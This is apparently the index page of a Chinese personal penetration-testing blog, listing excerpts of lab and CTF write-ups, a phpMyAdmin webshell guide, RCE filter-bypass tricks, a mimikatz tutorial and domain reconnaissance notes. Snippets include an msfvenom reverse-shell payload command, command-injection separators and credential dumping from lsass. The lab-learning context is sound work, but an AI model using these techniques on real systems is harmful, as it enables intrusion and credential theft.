Kyon-H Blog

「离开世界之前 一切都是过程」

CISP-PTE win2003 靶场

CISP-PTE win2003 靶场

1. 信息搜集 扫描存活主机 1 nmap -sn 192.168.163.0/24 发现靶机:192.168.163.126 扫描端口 1 nmap -T5 -sS -p- 192.168.163.128 操作系统扫描 1 nmap -O 192.168.163.128 端口指纹扫描 1 nmap -T5 -sS -sV -p 1433,27689 19...

Posted by Kyon-H on August 16, 2025

CISP-PTE win2008 靶场

CISP-PTE win2008 靶场

1. 靶场环境 2. 信息搜集 nmap 扫描存活主机,发现主机 192.168.163.130 1 nmap -sn 192.168.163.0/24 扫描端口 1 namp -sS -p- -T5 192.168.163.130 发现 http 站点和 mysql 数据库 访问站点 弹出登录框 bp 抓包查看,发现 base64 编码的认证头 解...

Posted by Kyon-H on August 16, 2025

phpMyadmin getShell方法

phpMyadmin getShell

1. phpMyAdmin getshell 常见套路 Windows 和 Linux 原理基本相同 1.1. INTO OUTFILE 写 PHP 马 原理:MySQL 可以把查询结果直接写到服务器文件系统,如果 Web 目录可写,就能写一段 PHP 代码变成 WebShell。 条件检查: 1 2 SHOW VARIABLES LIKE 'secure_file_priv'; ...

Posted by Kyon-H on August 15, 2025

远程命令执行

RCE

1. RCE 漏洞利用 1.1. 命令连接符 ; |、|| &、%26、&&、%26%26 %0a 1.2. 空格过滤绕过 ${IFS}、$IFS、$IFS$9 < 、>、<> %09:相当于 Tab {,}:{cat,flag.php} 1.3. 文件名过滤绕过 ??:cat flag...

Posted by Kyon-H on August 12, 2025

mimikatz 使用教程

mimikatz

[!NOTE] 项目地址:gentilkiwi/mimikatz: A little tool to play with Windows security 1. 基本介绍 mimikatz 是一款功能强大的轻量级进程调试工具,在安全领域最大的亮点就是他可以直接从 lsass 中获取当前处于 Active 系统的登录密码 2. 基本使用 2.1. 获取本地密码 获取调试权限 ...

Posted by Kyon-H on July 30, 2025

域内信息搜集

域内信息搜集

1. 用户权限 1.1. 查看当前用户 1 2 3 whoami # 域名\用户名 # 机器名\用户名 在域中本地普通用户只能查询本机相关信息,不能查询域内信息,而本地管理员用户和域内用户可以查询域内信息。 其原理是:域内的所有查询都是通过域控制器实现的(基于LDAP协议),而这个查询需要经过权限认证,所以,只有域用户才拥有这个权限;当域用户执行查询命令时,会自动使用 Kerber...

Posted by Kyon-H on July 25, 2025

Windows 主机信息搜集

Windows 主机信息搜集

1. 前置条件 反弹 shell Kali: 1 2 3 4 5 6 7 msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_t...

Posted by Kyon-H on July 24, 2025

内网渗透基础

内网渗透基础

网络安全分类: web安全: 主机安全:提权、root、 内网安全:域、工作组、横向移动、端口转发、代理、持久化 Windows 域(Windows Domain) 是由 Microsoft Windows Server 操作系统所管理的一种网络结构,常用于企业或组织内部。它实现了对网络中用户账号、计算机、权限、安全策略等资源的集中管理与控制。 域控制器(Domai...

Posted by Kyon-H on July 23, 2025

个人服务器搭建

个人服务器搭建

1. 背景 随着影像画质提升(照片从KB级增至MB级,电影从1080P迈向4K),个人数据量激增。尽管可通过扩容硬盘/手机存储数据,但跨设备传输效率低下。因此,搭建个人服务器实现集中存储与共享,正成为高效解决方案。 是什么: 个人服务器可以是专业服务器或云服务器,也可以是一台电脑,一台NAS(网络附属存储),一个N1盒子,但凡是可以连接网络,并且满足我们日常需求的智能设备,都可以称为个...

Posted by Kyon-H on July 19, 2025

Momentum 2

Momentum 2

1. 信息收集 扫描IP 发现 192.168.163.131 扫描端口,开发80、22端口 扫描目录 查看站点,/manual发现文件上传 相关js代码,向ajax.php发送数据,返回1代表成功 目录扫描发现 ajax.php.bak文件 根据代码,需要添加cookie,且最后一位追加大写字母,设置参数 secure值为 val1d,则可以上传php...

Posted by Kyon-H on July 19, 2025

FEATURED TAGS
DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护
ABOUT ME